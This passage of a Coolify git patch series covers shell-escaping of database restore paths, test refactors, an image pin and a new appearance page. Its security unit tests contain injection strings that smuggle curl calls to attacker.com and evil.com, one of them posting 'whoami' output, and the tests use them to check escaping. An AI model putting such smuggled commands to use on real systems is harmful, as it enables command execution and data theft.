     $component->postgresqlRestoreCommand = 'psql -U $POSTGRES_USER -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname IS NOT NULL AND pid <> pg_backend_pid()" && psql -U $POSTGRES_USER -t -c "SELECT datname FROM pg_database WHERE NOT datistemplate" | xargs -I {} dropdb -U $POSTGRES_USER --if-exists {} && createdb -U $POSTGRES_USER postgres';
 
-    $database = Mockery::mock('App\Models\StandalonePostgresql');
-    $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandalonePostgresql');
-    $component->resource = $database;
-
     $result = $component->buildRestoreCommand('/tmp/test.dump');
 
     expect($result)->toContain('gunzip -cf /tmp/test.dump');
-    expect($result)->toContain('psql -U $POSTGRES_USER postgres');
+    expect($result)->toContain('psql -U ${POSTGRES_USER} -d ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}');
 });
 
 test('buildRestoreCommand handles MySQL without dumpAll', function () {
-    $component = new Import;
+    $component = importFormWithResource('App\Models\StandaloneMysql');
     $component->dumpAll = false;
     $component->mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE';
 
-    $database = Mockery::mock('App\Models\StandaloneMysql');
-    $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandaloneMysql');
-    $component->resource = $database;
-
     $result = $component->buildRestoreCommand('/tmp/test.dump');
 
     expect($result)->toContain('mysql -u $MYSQL_USER');
@@ -49,31 +50,23 @@
 });
 
 test('buildRestoreCommand handles MariaDB without dumpAll', function () {
-    $component = new Import;
+    $component = importFormWithResource('App\Models\StandaloneMariadb');
     $component->dumpAll = false;
     $component->mariadbRestoreCommand = 'mariadb -u $MARIADB_USER -p$MARIADB_PASSWORD $MARIADB_DATABASE';
 
-    $database = Mockery::mock('App\Models\StandaloneMariadb');
-    $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandaloneMariadb');
-    $component->resource = $database;
-
     $result = $component->buildRestoreCommand('/tmp/test.dump');
 
     expect($result)->toContain('mariadb -u $MARIADB_USER');
     expect($result)->toContain('< /tmp/test.dump');
 });
 
-test('buildRestoreCommand handles MongoDB', function () {
-    $component = new Import;
-    $component->dumpAll = false;
+test('buildRestoreCommand always appends the MongoDB archive path', function (bool $dumpAll) {
+    $component = importFormWithResource('App\Models\StandaloneMongodb');
+    $component->dumpAll = $dumpAll;
     $component->mongodbRestoreCommand = 'mongorestore --authenticationDatabase=admin --username $MONGO_INITDB_ROOT_USERNAME --password $MONGO_INITDB_ROOT_PASSWORD --uri mongodb://localhost:27017 --gzip --archive=';
 
-    $database = Mockery::mock('App\Models\StandaloneMongodb');
-    $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandaloneMongodb');
-    $component->resource = $database;
-
     $result = $component->buildRestoreCommand('/tmp/test.dump');
 
     expect($result)->toContain('mongorestore');
-    expect($result)->toContain('/tmp/test.dump');
-});
+    expect($result)->toContain('--archive=/tmp/test.dump');
+})->with([false, true]);

From 1af5cc11c93d047bfd0e00e7c9d50472a834d199 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 29 May 2026 12:14:17 +0530
Subject: [PATCH 38/90] fix(service): set correct image tag for
 hermes-agent-with-webui

---
 templates/compose/hermes-agent-with-webui.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/hermes-agent-with-webui.yaml b/templates/compose/hermes-agent-with-webui.yaml
index 2d30396d8..a55b8c79a 100644
--- a/templates/compose/hermes-agent-with-webui.yaml
+++ b/templates/compose/hermes-agent-with-webui.yaml
@@ -7,7 +7,7 @@
 
 services:
   hermes-agent:
-    image: nousresearch/hermes-agent:sha-273ff5c4a47af4499bbe5e3b1139efd313995554
+    image: 'nousresearch/hermes-agent@sha256:2f1f2f1725e5dc9a61cf6a2dea5aca52a776ec4d022cb29679e6aa3ff303e77a' # v2026.5.29
     command: gateway run
     environment:
       - HERMES_HOME=/home/hermes/.hermes

From 6cd05fb5599211a44a45f3469a68f71ba63b047a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 29 May 2026 11:18:53 +0200
Subject: [PATCH 39/90] fix(webhooks): point auth-required docs to
 authorization

---
 resources/views/livewire/project/shared/webhooks.blade.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/resources/views/livewire/project/shared/webhooks.blade.php b/resources/views/livewire/project/shared/webhooks.blade.php
index 80fcfadc5..24bba525a 100644
--- a/resources/views/livewire/project/shared/webhooks.blade.php
+++ b/resources/views/livewire/project/shared/webhooks.blade.php
@@ -2,11 +2,11 @@
     <div class="flex items-center gap-2">
         <h2>Webhooks</h2>
         <x-helper
-            helper="For more details goto our <a class='underline dark:text-white' href='https://coolify.io/docs/api-reference/api/operations/deploy-by-tag-or-uuid' target='_blank'>docs</a>." />
+            helper="For more details goto our <a class='underline dark:text-white' href='https://coolify.io/docs/api-reference/authorization' target='_blank'>docs</a>." />
     </div>
     <div>
         <x-forms.input readonly
-            helper="See details in our <a target='_blank' class='underline dark:text-white' href='https://coolify.io/docs/api-reference/api/operations/deploy-by-tag-or-uuid'>documentation</a>."
+            helper="See details in our <a target='_blank' class='underline dark:text-white' href='https://coolify.io/docs/api-reference/authorization'>documentation</a>."
             label="Deploy Webhook (auth required)" id="deploywebhook"></x-forms.input>
     </div>
     @if ($resource->type() === 'application')

From c5fbf78bd815b3c1497411d227a0e1eea778bbec Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 29 May 2026 12:27:33 +0200
Subject: [PATCH 40/90] fix(database): quote S3 restore temp paths

Escape generated restore file paths before composing docker and shell cleanup commands so paths with spaces or metacharacters cannot break command execution. Update import form security coverage to target ImportForm directly.
---
 app/Livewire/Project/Database/ImportForm.php  | 43 +++++----
 .../DatabaseImportCommandInjectionTest.php    | 35 ++++----
 .../Database/ImportCheckFileButtonTest.php    | 27 +++---
 tests/Unit/S3RestoreSecurityTest.php          | 87 ++++++++++++++++++-
 4 files changed, 138 insertions(+), 54 deletions(-)

diff --git a/app/Livewire/Project/Database/ImportForm.php b/app/Livewire/Project/Database/ImportForm.php
index 3b72383a5..ccc7b347d 100644
--- a/app/Livewire/Project/Database/ImportForm.php
+++ b/app/Livewire/Project/Database/ImportForm.php
@@ -685,13 +685,21 @@ public function restoreFromS3(string $password = ''): bool|string
             $containerTmpPath = "/tmp/restore_{$this->resourceUuid}-".basename($cleanPath);
             $scriptPath = "/tmp/restore_{$this->resourceUuid}.sh";
 
+            $escapedServerTmpPath = escapeshellarg($serverTmpPath);
+            $escapedContainerTmpPath = escapeshellarg($containerTmpPath);
+            $escapedScriptPath = escapeshellarg($scriptPath);
+            $escapedHelperContainerPath = escapeshellarg("{$containerName}:{$helperTmpPath}");
+            $escapedDatabaseContainerTmpPath = escapeshellarg("{$this->container}:{$containerTmpPath}");
+            $escapedDatabaseContainerScriptPath = escapeshellarg("{$this->container}:{$scriptPath}");
+            $restoreAndCleanupCommand = escapeshellarg("{$escapedScriptPath} && rm -f {$escapedContainerTmpPath} {$escapedScriptPath}");
+
             // Prepare all commands in sequence
             $commands = [];
 
             // 1. Clean up any existing helper container and temp files from previous runs
             $commands[] = "docker rm -f {$containerName} 2>/dev/null || true";
-            $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true";
-            $commands[] = "docker exec {$this->container} rm -f {$containerTmpPath} {$scriptPath} 2>/dev/null || true";
+            $commands[] = "rm -f {$escapedServerTmpPath} 2>/dev/null || true";
+            $commands[] = "docker exec {$this->container} rm -f {$escapedContainerTmpPath} {$escapedScriptPath} 2>/dev/null || true";
 
             // 2. Start helper container on the database network
             $commands[] = "docker run -d --network {$destinationNetwork} --name {$containerName} {$fullImageName} sleep 3600";
@@ -703,8 +711,6 @@ public function restoreFromS3(string $password = ''): bool|string
             $commands[] = "docker exec {$containerName} mc alias set s3temp {$escapedEndpoint} {$escapedKey} {$escapedSecret}";
 
             // 4. Check file exists in S3 (bucket and path already validated above)
-            $escapedBucket = escapeshellarg($bucket);
-            $escapedCleanPath = escapeshellarg($cleanPath);
             $escapedS3Source = escapeshellarg("s3temp/{$bucket}/{$cleanPath}");
             $commands[] = "docker exec {$containerName} mc stat {$escapedS3Source}";
 
@@ -713,23 +719,23 @@ public function restoreFromS3(string $password = ''): bool|string
             $commands[] = "docker exec {$containerName} mc cp {$escapedS3Source} {$escapedHelperTmpPath}";
 
             // 6. Copy from helper to server, then immediately to database container
-            $commands[] = "docker cp {$containerName}:{$helperTmpPath} {$serverTmpPath}";
-            $commands[] = "docker cp {$serverTmpPath} {$this->container}:{$containerTmpPath}";
+            $commands[] = "docker cp {$escapedHelperContainerPath} {$escapedServerTmpPath}";
+            $commands[] = "docker cp {$escapedServerTmpPath} {$escapedDatabaseContainerTmpPath}";
 
             // 7. Cleanup helper container and server temp file immediately (no longer needed)
             $commands[] = "docker rm -f {$containerName} 2>/dev/null || true";
-            $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true";
+            $commands[] = "rm -f {$escapedServerTmpPath} 2>/dev/null || true";
 
             // 8. Build and execute restore command inside database container
             $restoreCommand = $this->buildRestoreCommand($containerTmpPath);
 
             $restoreCommandBase64 = base64_encode($restoreCommand);
-            $commands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$scriptPath}";
-            $commands[] = "chmod +x {$scriptPath}";
-            $commands[] = "docker cp {$scriptPath} {$this->container}:{$scriptPath}";
+            $commands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$escapedScriptPath}";
+            $commands[] = "chmod +x {$escapedScriptPath}";
+            $commands[] = "docker cp {$escapedScriptPath} {$escapedDatabaseContainerScriptPath}";
 
             // 9. Execute restore and cleanup temp files immediately after completion
-            $commands[] = "docker exec {$this->container} sh -c '{$scriptPath} && rm -f {$containerTmpPath} {$scriptPath}'";
+            $commands[] = "docker exec {$this->container} sh -c {$restoreAndCleanupCommand}";
             $commands[] = "docker exec {$this->container} sh -c 'echo \"Import finished with exit code $?\"'";
 
             // Execute all commands with cleanup event (as safety net for edge cases)
@@ -761,6 +767,7 @@ public function restoreFromS3(string $password = ''): bool|string
 
     public function buildRestoreCommand(string $tmpPath): string
     {
+        $escapedTmpPath = escapeshellarg($tmpPath);
         $morphClass = $this->resource->getMorphClass();
 
         // Handle ServiceDatabase by checking the database type
@@ -782,32 +789,32 @@ public function buildRestoreCommand(string $tmpPath): string
             case 'mariadb':
                 $restoreCommand = $this->mariadbRestoreCommand;
                 if ($this->dumpAll) {
-                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mariadb -u root -p\$MARIADB_ROOT_PASSWORD \${MARIADB_DATABASE:-default}";
+                    $restoreCommand .= " && (gunzip -cf {$escapedTmpPath} 2>/dev/null || cat {$escapedTmpPath}) | mariadb -u root -p\$MARIADB_ROOT_PASSWORD \${MARIADB_DATABASE:-default}";
                 } else {
-                    $restoreCommand .= " < {$tmpPath}";
+                    $restoreCommand .= " < {$escapedTmpPath}";
                 }
                 break;
             case StandaloneMysql::class:
             case 'mysql':
                 $restoreCommand = $this->mysqlRestoreCommand;
                 if ($this->dumpAll) {
-                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | mysql -u root -p\$MYSQL_ROOT_PASSWORD \${MYSQL_DATABASE:-default}";
+                    $restoreCommand .= " && (gunzip -cf {$escapedTmpPath} 2>/dev/null || cat {$escapedTmpPath}) | mysql -u root -p\$MYSQL_ROOT_PASSWORD \${MYSQL_DATABASE:-default}";
                 } else {
-                    $restoreCommand .= " < {$tmpPath}";
+                    $restoreCommand .= " < {$escapedTmpPath}";
                 }
                 break;
             case StandalonePostgresql::class:
             case 'postgresql':
                 $restoreCommand = $this->postgresqlRestoreCommand;
                 if ($this->dumpAll) {
-                    $restoreCommand .= " && (gunzip -cf {$tmpPath} 2>/dev/null || cat {$tmpPath}) | psql -U \${POSTGRES_USER} -d \${POSTGRES_DB:-\${POSTGRES_USER:-postgres}}";
+                    $restoreCommand .= " && (gunzip -cf {$escapedTmpPath} 2>/dev/null || cat {$escapedTmpPath}) | psql -U \${POSTGRES_USER} -d \${POSTGRES_DB:-\${POSTGRES_USER:-postgres}}";
                 } else {
-                    $restoreCommand .= " {$tmpPath}";
+                    $restoreCommand .= " {$escapedTmpPath}";
                 }
                 break;
             case StandaloneMongodb::class:
             case 'mongodb':
-                $restoreCommand = $this->mongodbRestoreCommand."{$tmpPath}";
+                $restoreCommand = $this->mongodbRestoreCommand.$escapedTmpPath;
                 break;
             default:
                 $restoreCommand = '';
diff --git a/tests/Feature/DatabaseImportCommandInjectionTest.php b/tests/Feature/DatabaseImportCommandInjectionTest.php
index f7b1bbbed..114d19884 100644
--- a/tests/Feature/DatabaseImportCommandInjectionTest.php
+++ b/tests/Feature/DatabaseImportCommandInjectionTest.php
@@ -1,7 +1,8 @@
 <?php
 
-use App\Livewire\Project\Database\Import;
+use App\Livewire\Project\Database\ImportForm;
 use App\Support\ValidationPatterns;
+use Livewire\Attributes\Locked;
 
 describe('container name validation', function () {
     test('isValidContainerName accepts valid container names', function () {
@@ -45,43 +46,43 @@
 
 describe('locked properties', function () {
     test('container property has Locked attribute', function () {
-        $property = new ReflectionProperty(Import::class, 'container');
-        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+        $property = new ReflectionProperty(ImportForm::class, 'container');
+        $attributes = $property->getAttributes(Locked::class);
 
         expect($attributes)->not->toBeEmpty();
     });
 
     test('serverId property has Locked attribute', function () {
-        $property = new ReflectionProperty(Import::class, 'serverId');
-        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+        $property = new ReflectionProperty(ImportForm::class, 'serverId');
+        $attributes = $property->getAttributes(Locked::class);
 
         expect($attributes)->not->toBeEmpty();
     });
 
     test('resourceId property has Locked attribute', function () {
-        $property = new ReflectionProperty(Import::class, 'resourceId');
-        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+        $property = new ReflectionProperty(ImportForm::class, 'resourceId');
+        $attributes = $property->getAttributes(Locked::class);
 
         expect($attributes)->not->toBeEmpty();
     });
 
     test('resourceType property has Locked attribute', function () {
-        $property = new ReflectionProperty(Import::class, 'resourceType');
-        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+        $property = new ReflectionProperty(ImportForm::class, 'resourceType');
+        $attributes = $property->getAttributes(Locked::class);
 
         expect($attributes)->not->toBeEmpty();
     });
 
     test('resourceUuid property has Locked attribute', function () {
-        $property = new ReflectionProperty(Import::class, 'resourceUuid');
-        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+        $property = new ReflectionProperty(ImportForm::class, 'resourceUuid');
+        $attributes = $property->getAttributes(Locked::class);
 
         expect($attributes)->not->toBeEmpty();
     });
 
     test('resourceDbType property has Locked attribute', function () {
-        $property = new ReflectionProperty(Import::class, 'resourceDbType');
-        $attributes = $property->getAttributes(\Livewire\Attributes\Locked::class);
+        $property = new ReflectionProperty(ImportForm::class, 'resourceDbType');
+        $attributes = $property->getAttributes(Locked::class);
 
         expect($attributes)->not->toBeEmpty();
     });
@@ -89,7 +90,7 @@
 
 describe('server method uses team scoping', function () {
     test('server computed property calls ownedByCurrentTeam', function () {
-        $method = new ReflectionMethod(Import::class, 'server');
+        $method = new ReflectionMethod(ImportForm::class, 'server');
 
         // Extract the server method body
         $startLine = $method->getStartLine();
@@ -102,9 +103,9 @@
     });
 });
 
-describe('Import component uses shared ValidationPatterns', function () {
+describe('ImportForm component uses shared ValidationPatterns', function () {
     test('runImport references ValidationPatterns for container validation', function () {
-        $method = new ReflectionMethod(Import::class, 'runImport');
+        $method = new ReflectionMethod(ImportForm::class, 'runImport');
         $startLine = $method->getStartLine();
         $endLine = $method->getEndLine();
         $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
@@ -114,7 +115,7 @@
     });
 
     test('restoreFromS3 references ValidationPatterns for container validation', function () {
-        $method = new ReflectionMethod(Import::class, 'restoreFromS3');
+        $method = new ReflectionMethod(ImportForm::class, 'restoreFromS3');
         $startLine = $method->getStartLine();
         $endLine = $method->getEndLine();
         $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
diff --git a/tests/Unit/Project/Database/ImportCheckFileButtonTest.php b/tests/Unit/Project/Database/ImportCheckFileButtonTest.php
index a305160c0..8d8d29de8 100644
--- a/tests/Unit/Project/Database/ImportCheckFileButtonTest.php
+++ b/tests/Unit/Project/Database/ImportCheckFileButtonTest.php
@@ -1,15 +1,11 @@
 <?php
 
-use App\Livewire\Project\Database\Import;
-use App\Models\Server;
+use App\Livewire\Project\Database\ImportForm;
 
 test('checkFile does nothing when customLocation is empty', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $component->customLocation = '';
 
-    $mockServer = Mockery::mock(Server::class);
-    $component->server = $mockServer;
-
     // No server commands should be executed when customLocation is empty
     $component->checkFile();
 
@@ -17,19 +13,16 @@
 });
 
 test('checkFile validates file exists on server when customLocation is filled', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $component->customLocation = '/tmp/backup.sql';
 
-    $mockServer = Mockery::mock(Server::class);
-    $component->server = $mockServer;
-
     // This test verifies the logic flows when customLocation has a value
     // The actual remote process execution is tested elsewhere
     expect($component->customLocation)->toBe('/tmp/backup.sql');
 });
 
 test('customLocation can be cleared to allow uploaded file to be used', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $component->customLocation = '/tmp/backup.sql';
 
     // Simulate clearing the customLocation (as happens when file is uploaded)
@@ -39,7 +32,7 @@
 });
 
 test('validateBucketName accepts valid bucket names', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $method = new ReflectionMethod($component, 'validateBucketName');
 
     // Valid bucket names
@@ -51,7 +44,7 @@
 });
 
 test('validateBucketName rejects invalid bucket names', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $method = new ReflectionMethod($component, 'validateBucketName');
 
     // Invalid bucket names (command injection attempts)
@@ -65,7 +58,7 @@
 });
 
 test('validateS3Path accepts valid S3 paths', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $method = new ReflectionMethod($component, 'validateS3Path');
 
     // Valid S3 paths
@@ -77,7 +70,7 @@
 });
 
 test('validateS3Path rejects invalid S3 paths', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $method = new ReflectionMethod($component, 'validateS3Path');
 
     // Invalid S3 paths (command injection attempts)
@@ -97,7 +90,7 @@
 });
 
 test('validateServerPath accepts valid server paths', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $method = new ReflectionMethod($component, 'validateServerPath');
 
     // Valid server paths (must be absolute)
@@ -108,7 +101,7 @@
 });
 
 test('validateServerPath rejects invalid server paths', function () {
-    $component = new Import;
+    $component = new ImportForm;
     $method = new ReflectionMethod($component, 'validateServerPath');
 
     // Invalid server paths
diff --git a/tests/Unit/S3RestoreSecurityTest.php b/tests/Unit/S3RestoreSecurityTest.php
index c224ec48c..51c374af5 100644
--- a/tests/Unit/S3RestoreSecurityTest.php
+++ b/tests/Unit/S3RestoreSecurityTest.php
@@ -1,8 +1,14 @@
 <?php
 
+use App\Livewire\Project\Database\ImportForm;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+
 it('escapeshellarg properly escapes S3 credentials with shell metacharacters', function () {
     // Test that escapeshellarg works correctly for various malicious inputs
-    // This is the core security mechanism used in Import.php line 407-410
+    // This is the core security mechanism used by ImportForm.
 
     // Test case 1: Secret with command injection attempt
     $maliciousSecret = 'secret";curl https://attacker.com/ -X POST --data `whoami`;echo "pwned';
@@ -41,7 +47,7 @@
 });
 
 it('verifies command injection is prevented in mc alias set command format', function () {
-    // Simulate the exact scenario from Import.php:407-410
+    // Simulate the exact scenario from ImportForm.
     $containerName = 's3-restore-test-uuid';
     $endpoint = 'https://s3.example.com";curl http://evil.com;echo "';
     $key = 'AKIATEST";whoami;"';
@@ -96,3 +102,80 @@
     // The command should contain the properly escaped secret
     expect($command)->toContain("'my'\\''secret'\\''key'");
 });
+
+it('quotes restore command temp paths with spaces', function (string $morphClass) {
+    $component = new class extends ImportForm
+    {
+        public string $morphClass;
+
+        public function __get($property)
+        {
+            if ($property === 'resource') {
+                return new class($this->morphClass)
+                {
+                    public function __construct(private readonly string $morphClass) {}
+
+                    public function getMorphClass(): string
+                    {
+                        return $this->morphClass;
+                    }
+                };
+            }
+
+            return parent::__get($property);
+        }
+    };
+    $component->morphClass = $morphClass;
+
+    $tmpPath = '/tmp/restore_test-may 2026.sql.gz';
+    $restoreCommand = $component->buildRestoreCommand($tmpPath);
+
+    expect($restoreCommand)
+        ->toContain(escapeshellarg($tmpPath))
+        ->not->toContain(" {$tmpPath}");
+})->with([
+    'mariadb' => StandaloneMariadb::class,
+    'mysql' => StandaloneMysql::class,
+    'postgresql' => StandalonePostgresql::class,
+    'mongodb' => StandaloneMongodb::class,
+]);
+
+it('quotes dump all restore command temp paths with spaces', function (string $morphClass) {
+    $component = new class extends ImportForm
+    {
+        public string $morphClass;
+
+        public function __get($property)
+        {
+            if ($property === 'resource') {
+                return new class($this->morphClass)
+                {
+                    public function __construct(private readonly string $morphClass) {}
+
+                    public function getMorphClass(): string
+                    {
+                        return $this->morphClass;
+                    }
+                };
+            }
+
+            return parent::__get($property);
+        }
+    };
+    $component->morphClass = $morphClass;
+    $component->dumpAll = true;
+
+    $tmpPath = '/tmp/restore_test-may 2026.sql.gz';
+    $escapedTmpPath = escapeshellarg($tmpPath);
+    $restoreCommand = $component->buildRestoreCommand($tmpPath);
+
+    expect($restoreCommand)
+        ->toContain("gunzip -cf {$escapedTmpPath}")
+        ->toContain("cat {$escapedTmpPath}")
+        ->not->toContain("gunzip -cf {$tmpPath}")
+        ->not->toContain("cat {$tmpPath}");
+})->with([
+    'mariadb' => StandaloneMariadb::class,
+    'mysql' => StandaloneMysql::class,
+    'postgresql' => StandalonePostgresql::class,
+]);

From b81bfc7f32a461ce606928b2ed6f2a5430134c23 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 29 May 2026 13:59:01 +0200
Subject: [PATCH 41/90] feat(profile): add appearance preferences page

Add a profile appearance section for theme, page width, and zoom preferences.
Move changelog access into the sidebar and bump the Coolify version to 4.1.2.
---
 app/Livewire/Profile/Appearance.php           |  13 ++
 app/Livewire/SettingsDropdown.php             |   2 +
 config/constants.php                          |   2 +-
 docker-compose.dev.yml                        |   2 +-
 other/nightly/versions.json                   |   2 +-
 resources/views/components/navbar.blade.php   |  86 +++++++-
 .../views/components/profile/navbar.blade.php |  17 ++
 .../livewire/profile/appearance.blade.php     | 119 +++++++++++
 .../views/livewire/profile/index.blade.php    |   3 +-
 .../livewire/settings-dropdown.blade.php      | 191 +++++++-----------
 routes/web.php                                |   2 +
 .../ProfileAppearanceNavigationTest.php       |  43 ++++
 .../SidebarNavigationPreferencesTest.php      |  63 ++++++
 versions.json                                 |   2 +-
 14 files changed, 417 insertions(+), 130 deletions(-)
 create mode 100644 app/Livewire/Profile/Appearance.php
 create mode 100644 resources/views/components/profile/navbar.blade.php
 create mode 100644 resources/views/livewire/profile/appearance.blade.php
 create mode 100644 tests/Feature/ProfileAppearanceNavigationTest.php
 create mode 100644 tests/Feature/SidebarNavigationPreferencesTest.php

diff --git a/app/Livewire/Profile/Appearance.php b/app/Livewire/Profile/Appearance.php
new file mode 100644
index 000000000..6a1b72f80
--- /dev/null
+++ b/app/Livewire/Profile/Appearance.php
@@ -0,0 +1,13 @@
+<?php
+
+namespace App\Livewire\Profile;
+
+use Livewire\Component;
+
+class Appearance extends Component
+{
+    public function render()
+    {
+        return view('livewire.profile.appearance');
+    }
+}
diff --git a/app/Livewire/SettingsDropdown.php b/app/Livewire/SettingsDropdown.php
index 7afa763df..cd41197cb 100644
--- a/app/Livewire/SettingsDropdown.php
+++ b/app/Livewire/SettingsDropdown.php
@@ -11,6 +11,8 @@ class SettingsDropdown extends Component
 {
     public $showWhatsNewModal = false;
 
+    public string $trigger = 'preferences';
+
     public function getUnreadCountProperty()
     {
         return Auth::user()->getUnreadChangelogCount();
diff --git a/config/constants.php b/config/constants.php
index e5dcee3fe..ac3c89feb 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -2,7 +2,7 @@
 
 return [
     'coolify' => [
-        'version' => '4.1.1',
+        'version' => '4.1.2',
         'helper_version' => '1.0.14',
         'realtime_version' => '1.0.15',
         'railpack_version' => '0.23.0',
diff --git a/docker-compose.dev.yml b/docker-compose.dev.yml
index 50edc140f..9c93678af 100644
--- a/docker-compose.dev.yml
+++ b/docker-compose.dev.yml
@@ -129,7 +129,7 @@ services:
     networks:
       - coolify
   minio:
-    image: ghcr.io/coollabsio/maxio:latest
+    image: coollabsio/maxio:latest
     pull_policy: always
     container_name: coolify-minio
     ports:
diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index 78b027918..0c2bf23a2 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -1,7 +1,7 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.1.1"
+            "version": "4.1.2"
         },
         "nightly": {
             "version": "4.2.0"
diff --git a/resources/views/components/navbar.blade.php b/resources/views/components/navbar.blade.php
index 433102dcb..a8a9aaf76 100644
--- a/resources/views/components/navbar.blade.php
+++ b/resources/views/components/navbar.blade.php
@@ -49,23 +49,32 @@
                 localStorage.setItem('theme', type);
                 this.queryTheme();
             },
+            cycleTheme() {
+                const themes = ['light', 'system', 'dark'];
+                const currentIndex = themes.indexOf(this.theme || localStorage.getItem('theme') || 'dark');
+                this.setTheme(themes[(currentIndex + 1) % themes.length]);
+            },
             queryTheme() {
                 const darkModePreference = window.matchMedia('(prefers-color-scheme: dark)').matches;
                 const userSettings = localStorage.getItem('theme') || 'dark';
                 localStorage.setItem('theme', userSettings);
+                let isDark = false;
                 if (userSettings === 'dark') {
                     document.documentElement.classList.add('dark');
                     this.theme = 'dark';
+                    isDark = true;
                 } else if (userSettings === 'light') {
                     document.documentElement.classList.remove('dark');
                     this.theme = 'light';
                 } else if (darkModePreference) {
                     this.theme = 'system';
                     document.documentElement.classList.add('dark');
+                    isDark = true;
                 } else if (!darkModePreference) {
                     this.theme = 'system';
                     document.documentElement.classList.remove('dark');
                 }
+                document.querySelector('meta[name=theme-color]')?.setAttribute('content', isDark ? '#101010' : '#ffffff');
             },
             checkZoom() {
                 if (this.zoom === null) {
@@ -92,9 +101,9 @@
                 }
             }
     }">
-    <div class="flex pt-4 pb-4 pl-2 items-start gap-2 motion-safe:transition-all motion-safe:duration-200 motion-safe:ease-out motion-reduce:transition-none"
-        :class="collapsed ? 'lg:flex-col lg:items-center lg:pl-0 lg:gap-3 lg:pt-7' : 'lg:pt-6'">
-        <div class="flex flex-col w-full" :class="collapsed && 'lg:hidden'">
+    <div class="flex pt-4 pb-4 pl-2 pr-3 items-start gap-3 motion-safe:transition-all motion-safe:duration-200 motion-safe:ease-out motion-reduce:transition-none"
+        :class="collapsed ? 'lg:flex-col lg:items-center lg:pl-0 lg:pr-0 lg:gap-3 lg:pt-7' : 'lg:pt-6'">
+        <div class="flex min-w-0 flex-1 flex-col" :class="collapsed && 'lg:hidden'">
             <a href="/" {{ wireNavigate() }} class="text-2xl font-bold tracking-tight dark:text-white hover:opacity-80 transition-opacity">Coolify</a>
             <x-version />
         </div>
@@ -107,10 +116,10 @@ class="hover:opacity-80 transition-opacity"
             </a>
             <x-version class="text-[10px]" />
         </div>
-        <div :class="collapsed && 'lg:hidden'">
+        <div class="min-w-0 flex-1" :class="collapsed && 'lg:hidden'">
             <!-- Search button that triggers global search modal -->
             <button @click="$dispatch('open-global-search')" type="button" title="Search (Press / or ⌘K)"
-                class="flex items-center gap-1.5 px-2.5 py-1.5 bg-neutral-100 dark:bg-coolgray-100 border border-neutral-300 dark:border-coolgray-200 rounded-md hover:bg-neutral-200 dark:hover:bg-coolgray-200 transition-colors">
+                class="flex h-8 w-full items-center justify-between gap-1.5 px-2.5 py-1.5 bg-neutral-100 dark:bg-coolgray-100 border border-neutral-300 dark:border-coolgray-200 rounded-md hover:bg-neutral-200 dark:hover:bg-coolgray-200 transition-colors">
                 <svg xmlns="http://www.w3.org/2000/svg" class="h-4 w-4 text-neutral-500 dark:text-neutral-400"
                     fill="none" viewBox="0 0 24 24" stroke="currentColor">
                     <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
@@ -120,9 +129,6 @@ class="flex items-center gap-1.5 px-2.5 py-1.5 bg-neutral-100 dark:bg-coolgray-1
                     class="px-1 py-0.5 text-xs font-semibold text-neutral-500 dark:text-neutral-400 bg-neutral-200 dark:bg-coolgray-200 rounded">/</kbd>
             </button>
         </div>
-        <div :class="collapsed && 'lg:hidden'">
-            <livewire:settings-dropdown />
-        </div>
     </div>
     <div class="px-2 pt-2 pb-7 overflow-hidden motion-safe:transition-all motion-safe:duration-200 motion-safe:ease-out motion-reduce:transition-none" :class="collapsed && 'lg:px-0 lg:pt-0 lg:pb-4 lg:min-h-8 lg:flex lg:justify-center'">
         <livewire:switch-team />
@@ -366,6 +372,70 @@ class="{{ request()->is('settings*') ? 'menu-item-active menu-item' : 'menu-item
                         @endif
                     @endif
                     <div class="flex-1"></div>
+                    <li>
+                        <livewire:settings-dropdown trigger="changelog-sidebar" />
+                    </li>
+                    <li>
+                        <div class="menu-item" title="Theme" aria-label="Theme switcher" :class="collapsed && 'lg:hidden'">
